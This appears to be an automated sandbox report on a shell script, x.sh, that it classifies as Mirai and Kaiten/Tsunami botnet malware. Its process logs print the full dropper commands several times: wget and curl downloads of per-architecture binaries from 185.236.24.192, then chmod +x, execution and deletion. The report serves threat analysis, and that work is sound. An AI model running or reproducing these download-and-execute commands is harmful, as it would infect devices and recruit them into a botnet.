Analysis Overview
SHA256
f8db4d2d9ec809a2d86f015f3a25685e47ca8889003914e2a5df5b9bfc6eabac
Threat Level: Known bad
The file x.sh was found to be: Known bad.
Malicious Activity Summary
Detects Kaiten/Tsunami payload
Detects Kaiten/Tsunami Payload
Mirai family
Mirai
Kaiten family
Kaiten/Tsunami
Modifies Watchdog functionality
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Executes dropped EXE
Enumerates running processes
Enumerates active TCP sockets
Reads system network configuration
Checks CPU configuration
Changes its process name
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-20 17:08
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2025-05-20 17:08
Reported
2025-05-20 17:10
Platform
debian9-mipsbe-20240418-en
Max time kernel
41s
Max time network
39s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GoldAge3ATOarm | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm5 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm6 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm7 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOm68k | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmips | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmpsl | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOppc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOsh4 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOspc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx64 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx86 | /tmp/x.sh | N/A |
| N/A | /tmp/bash | /tmp/x.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/GoldAge3ATOmips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash | /usr/bin/curl | N/A |
Processes
/tmp/x.sh
[/tmp/x.sh]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm]
/tmp/GoldAge3ATOarm
[/tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm5]
/tmp/GoldAge3ATOarm5
[/tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm6]
/tmp/GoldAge3ATOarm6
[/tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm7]
/tmp/GoldAge3ATOarm7
[/tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOm68k]
/tmp/GoldAge3ATOm68k
[/tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmips]
/tmp/GoldAge3ATOmips
[/tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmpsl]
/tmp/GoldAge3ATOmpsl
[/tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOppc]
/tmp/GoldAge3ATOppc
[/tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOsh4]
/tmp/GoldAge3ATOsh4
[/tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOspc]
/tmp/GoldAge3ATOspc
[/tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx64]
/tmp/GoldAge3ATOx64
[/tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx86]
/tmp/GoldAge3ATOx86
[/tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86.1]
/usr/bin/wget
[wget http://185.236.24.192/bash -O /tmp/bash]
/usr/bin/curl
[curl http://185.236.24.192/bash -o /tmp/bash]
/bin/chmod
[chmod +x /tmp/bash]
/tmp/bash
[/tmp/bash]
/bin/rm
[rm -rf /tmp/bash]
/bin/rm
[rm -rf /tmp/bash.1]
Network
| Country | Destination | Domain | Proto |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
Files
/tmp/GoldAge3ATOarm
| MD5 | c37a156e474db5c40f0affd035ee358f |
| SHA1 | 990bc43195246650ee6929c2c40afe7efa14d058 |
| SHA256 | 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876 |
| SHA512 | ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6 |
/tmp/GoldAge3ATOarm5
| MD5 | d8e7f95f2de61c8a75cf9cf7777ba06d |
| SHA1 | 040e5656fed375ef1c7e253822f0edb3f350616b |
| SHA256 | 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db |
| SHA512 | 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8 |
/tmp/GoldAge3ATOarm6
| MD5 | 3c5c66502403c26ffd38c305e0073e56 |
| SHA1 | 584b0a7b269f9e07d3d1ca9880b8710f035e435a |
| SHA256 | f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900 |
| SHA512 | 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89 |
/tmp/GoldAge3ATOarm7
| MD5 | d1bc7e87209a400dfa40307eca08289a |
| SHA1 | b9922e7972f0c46ecbcc18503b37b46299d3eaf9 |
| SHA256 | 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b |
| SHA512 | 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50 |
/tmp/GoldAge3ATOm68k
| MD5 | b9e708d1101756b3452ff33eaaa984f9 |
| SHA1 | f7744930aa85da6dbf7785c91e01e419987ce4e5 |
| SHA256 | 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1 |
| SHA512 | 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa |
/tmp/GoldAge3ATOmips
| MD5 | db3d52d93de2b229748c916d261ca0d5 |
| SHA1 | 29889196802fe35c0e5933991bd7f4a89de56946 |
| SHA256 | 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5 |
| SHA512 | 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652 |
/tmp/GoldAge3ATOmpsl
| MD5 | 2439dbad4a1cb56d7ea54b35aa36251e |
| SHA1 | b9d2099aaab3868094bb20bf556b3b20e8ea5203 |
| SHA256 | 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552 |
| SHA512 | 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25 |
/tmp/GoldAge3ATOppc
| MD5 | 92038a8e6f1123573cf5cd61d21f61ed |
| SHA1 | cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083 |
| SHA256 | a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8 |
| SHA512 | 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567 |
/tmp/GoldAge3ATOsh4
| MD5 | 5eba0470ee235a99e4b34517333a1cd1 |
| SHA1 | 0e417be4cc0769c9480f245941c2f0463147d1fd |
| SHA256 | ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb |
| SHA512 | 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468 |
/tmp/GoldAge3ATOspc
| MD5 | dfcc2c1625e3a1788667a70ca731dedb |
| SHA1 | bdc644788b8599579d8ce88e47270dc67839b226 |
| SHA256 | 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3 |
| SHA512 | 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57 |
/tmp/GoldAge3ATOx64
| MD5 | 399037675ef247197dec6471d9bfbf57 |
| SHA1 | 1fa81b589ee9e8764216b386e4fd5d1d3738bc39 |
| SHA256 | 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298 |
| SHA512 | 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1 |
/tmp/GoldAge3ATOx86
| MD5 | b6fe48263b89bb87446e76bb55170f26 |
| SHA1 | d88d976b1701dafe670a07313f14d3f217855850 |
| SHA256 | 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c |
| SHA512 | 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b |
/tmp/bash
| MD5 | 89ce675ecc4ca2e46f1c412a7074aaf9 |
| SHA1 | cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d |
| SHA256 | c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8 |
| SHA512 | a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31 |
Analysis: behavioral4
Detonation Overview
Submitted
2025-05-20 17:08
Reported
2025-05-20 17:10
Platform
debian9-mipsel-20250410-en
Max time kernel
40s
Max time network
40s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GoldAge3ATOarm | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm5 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm6 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm7 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOm68k | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmips | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmpsl | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOppc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOsh4 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOspc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx64 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx86 | /tmp/x.sh | N/A |
| N/A | /tmp/bash | /tmp/x.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/GoldAge3ATOmips | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash | /usr/bin/curl | N/A |
Processes
/tmp/x.sh
[/tmp/x.sh]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm]
/tmp/GoldAge3ATOarm
[/tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm5]
/tmp/GoldAge3ATOarm5
[/tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm6]
/tmp/GoldAge3ATOarm6
[/tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm7]
/tmp/GoldAge3ATOarm7
[/tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOm68k]
/tmp/GoldAge3ATOm68k
[/tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmips]
/tmp/GoldAge3ATOmips
[/tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmpsl]
/tmp/GoldAge3ATOmpsl
[/tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOppc]
/tmp/GoldAge3ATOppc
[/tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc]
/bin/rm
